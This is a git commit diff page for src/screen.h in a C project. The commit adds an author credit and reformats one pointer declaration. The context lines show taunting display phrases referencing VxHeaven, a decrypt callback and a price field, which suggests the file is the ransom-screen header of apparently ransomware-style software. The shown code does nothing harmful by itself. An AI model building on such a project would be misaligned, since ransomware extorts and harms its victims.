diff options
| author | @syxhe <https://t.me/syxhe> | 2024-09-03 14:18:21 -0500 |
|---|---|---|
| committer | @syxhe <https://t.me/syxhe> | 2024-09-03 14:18:21 -0500 |
| commit | 74f6e6577709d00306e336f5d824e01d7a107439 (patch) | |
| tree | 5f4078f327d540893ea6867518f1764913e9f503 /src/screen.h | |
| parent | bed4b90c91037dc4727303b241321c9af03b757a (diff) | |
DECRYPTION WORKS
Diffstat (limited to 'src/screen.h')
| -rw-r--r-- | src/screen.h | 3 |
1 files changed, 2 insertions, 1 deletions
diff --git a/src/screen.h b/src/screen.h index 43793b5..f4b29cd 100644 --- a/src/screen.h +++ b/src/screen.h | |||
| @@ -6,6 +6,7 @@ | |||
| 6 | #include <signal.h> | 6 | #include <signal.h> |
| 7 | 7 | ||
| 8 | #define phrases (const char *[]){\ | 8 | #define phrases (const char *[]){\ |
| 9 | /* by @syxhe on tg */ \ | ||
| 9 | "WE CLOWN IN THIS MF, TAKE YO SENSITIVE ASS BACK TO @GENTOOMEMES",\ | 10 | "WE CLOWN IN THIS MF, TAKE YO SENSITIVE ASS BACK TO @GENTOOMEMES",\ |
| 10 | "R.I.P VxHeaven",\ | 11 | "R.I.P VxHeaven",\ |
| 11 | "tmp(2) nuked by Smelly",\ | 12 | "tmp(2) nuked by Smelly",\ |
| @@ -188,7 +189,7 @@ struct params { | |||
| 188 | MENU *menu; | 189 | MENU *menu; |
| 189 | 190 | ||
| 190 | int (*decrypt_callback)(void*); | 191 | int (*decrypt_callback)(void*); |
| 191 | void *decrypt_args; | 192 | void* decrypt_args; |
| 192 | 193 | ||
| 193 | // Previously buyp | 194 | // Previously buyp |
| 194 | unsigned int price; | 195 | unsigned int price; |
